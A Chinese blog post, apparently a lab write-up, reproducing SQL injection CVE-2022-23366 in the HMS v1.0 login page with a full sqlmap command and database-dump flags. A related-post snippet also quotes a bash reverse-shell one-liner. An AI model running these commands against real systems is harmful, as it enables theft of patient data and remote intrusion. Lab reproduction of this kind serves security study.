HMS v1.0 SQL注入(CVE-2022-23366)

于 2024-07-18 11:16:03 发布
阅读量192 收藏
点赞数 1
分类专栏: # SQL注入 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140517794
版权

一、漏洞概述

医院管理系统 (HMS) 是一种基于计算机或网络的系统,有助于管理医院或任何医疗机构的运作。该系统或软件将有助于使整个功能无纸化。它将有关患者、医生、员工、医院管理细节等的所有信息集成到一个软件中。它有组成医院的各种专业人员的部分。HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞。

二、影响范围

HMS v1.0

三、访问页面

四、漏洞复现

1、登录,输入任意账号密码。

2、burp抓包

3、使用sqlmap跑注入点

python sqlmap.py -u "http://123.58.224.8:55763/adminlogin.php" --data="loginid=admin&password=123456789&rememberme=on&submit=Login" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --referer="http://123.58.224.8:55763/adminlogin.php" --delay=0 --timeout=30 --retries=0 --level=3 --risk=1 --threads=1 --time-sec=5 --technique=BEUSTQ -b --batch --answers="crack=N,dict=N,continue=Y,quit=N"

4、跑出loginid有注入,可以使用sqlmap常用命令。

sqlmap常用命令:
1、--dbs 获取数据库
2、--tables 获取数据库中所有的表 
3、--columns 参数用来获取字段
4、--dump 获取值

-D '数据库名' -T '表名' -C '字段名1,字段名2' --dump

风中追风-fzzf
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3825
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
HMS:医院管理系统
03-11
HMS,全称为Hospital Management System,是一款基于ASP.NET技术构建的医院管理软件。ASP.NET是微软公司推出的Web应用程序开发框架,它提供了丰富的功能和高效性能,使得开发者能够快速构建动态、交互式的Web服务和...
Hospital Management Startup 1.0 SQL 注入漏洞(CVE-2022-23366
最新发布
Flag少侠的博客
07-09 8983
打开靶场网上搜索了一下关于这个 CVE 的详细信息进入靶场后页面长这样在导航栏 LOG IN 中发现下拉导航栏有与目标漏洞文件关联的选项随便输入数值,登录时使用 BurpSuite 开启拦截数据包复制数据包的值到 txt 文件中使用 SQLMap 开跑。
春秋云境:CVE-2022-23366(Hospital Management Startup 1.0 sqli)
m0_65712192的博客
07-24 723
Hospital Management Startup 1.0 sqli(登录/后台)
[春秋云镜]CVE-2022-23366
niubi707的博客
11-29 1196
Hospital Management Startup 1.0 sqli 春秋靶场
林肯焊机GSDML-V2.3-HMS-ABCC-PRT2P-20140703
05-25
【标题】"林肯焊机GSDML-V2.3-HMS-ABCC-PRT2P-20140703"所指的是一款由林肯电气公司生产的焊接设备,型号为GSDML-V2.3。该型号特别包含了HMS(高性能系统)、ABCC(自动电流控制)以及PRT2P(双极脉冲技术)等关键...
GSDML-V2.2-HMS-ABCC-PRT1P-20100329.xml
08-18
阿特拉斯电枪4000 GSD文件
HMS CANopen硬件支持包HSP-0079 -S71200 -Canopen 1.0-V17版本
07-24
标题中的“HMS CANopen硬件支持包HSP-0079 -S71200 -Canopen 1.0-V17版本”是指由HMS Industrial Networks公司提供的一个针对Siemens S7-1200 PLC的CANopen设备接口解决方案。这个硬件支持包,也称为HSP(Hardware ...
HMS CANopen硬件支持包HSP-0079 -S71200 -Canopen 1.0-V18版本.zip
06-19
HMS CANopen硬件支持包HSP-0079 -S71200 -Canopen 1.0-V18版本是一个专为Siemens S7-1200系列PLC设计的软件包,旨在扩展其通信能力,使其能够无缝集成到CANopen网络中。CANopen是一种广泛应用的工业现场总线协议,它...
春秋云境:CVE-2022-23366
一只爱吃橙子的羊
12-06 711
Hospital Management Startup 1.0 sqli
春秋云镜 CVE-2022-23366
qq_22002773的博客
07-12 285
春秋云镜 CVE-2022-23366
【春秋云镜】CVE-2022-23366 Hospital Management Startup 1.0 sqli 解题思路
Dark-Specter的博客
12-15 892
到这一步,我们可以知道目标网站的登录页面,提交表单的时候有注入点,然后接下来用sqlmap直接脱库就可以,以下给大家整理出来的常用的命令,因为时间盲注这块第一次爆库是一个漫长的等待过程(如果目标数据库多的话),我都是边看美女边等待。抓到的包保存到可以找到的路径,命名为xxx.txt(名字随意),以我这边为例,因为我这sqlmap是在wsl kali环境里,我就直接命名CVE-2022-23366.txt保存至我的桌面(保存下来的操作就不细细展开截图了)爆字段里的内容,拿到flag。2、sqlmap脱库。
CVE-2022-23366 春秋云境.com
qq_42036164的博客
01-12 364
CVE-2022-23366
【春秋云境】CVE-2022-23366靶场记录
2301_78019493的博客
05-19 1120
注入点在登陆处,登录用burp抓包放到sqlmap跑。
【春秋云境】CVE-2022-23366靶场WP和CVE-2022-23316靶场WP
果粒程
12-04 1138
【春秋云境】CVE-2022-23366靶场WP和CVE-2022-23316靶场WP
HMS v1.0 appointment.php editid参数 SQL注入漏洞(CVE-2022-25491)
博客地址 www.sec0nd.top
07-03 2958
暑假闲来无事打打靶机 用的是vulfocus在线平台,我也是第一次用,没想到一次使用只有15min,而且,做的这个没有wp,本次复现不完全,就说一下进行的过程吧医院管理系统 (HMS) 是一种基于计算机或网络的系统,有助于管理医院或任何医疗机构的运作。该系统或软件将有助于使整个功能无纸化。它将有关患者、医生、员工、医院管理细节等的所有信息集成到一个软件中。它有组成医院的各种专业人员的部分。HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞。
gsdml-v2.3-hms-abcc-prt2p-20140703.xml 1.0
09-10
gsdml-v2.3-hms-abcc-prt2p-20140703.xml 1.0 是一个文件的名称和版本号。根据命名规则来看,该文件可能是基于 GSDML(通用设备描述语言) v2.3 版本编写的。GSDML 是一种用于描述和交换不同设备的功能和特性的 XML(可扩展标记语言)格式。在这个文件中,可能描述了一个与 HMS(传统船舶测量系统)、ABCC(自动货物操作系统)和 PRT2P(行业团体组织) 相关的设备或系统。 文件命名中的 "20140703" 可能表示该文件的版本或创建日期,即2014年7月3日。而 "xml 1.0" 表示该文件遵循的 XML 版本为 1.0,也就是最早的 XML 版本。 这个文件的具体内容和用途需要根据实际情况来定。根据文件名可以推测,它可能是一个船舶测量系统的配置文件,用于描述和设置传感器、控制器、数据采集等设备的功能和参数。XML 格式的文件通常具有结构化的标签和属性,可以使不同软件和系统之间进行数据交换和共享。因此,该文件可能在航运、物流或船舶相关的行业中用于设备配置、数据传输等方面的应用。最后,需要注意的是,以上只是对文件名称的推测,具体内容和用途还需要进一步的信息和分析来进行确认。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值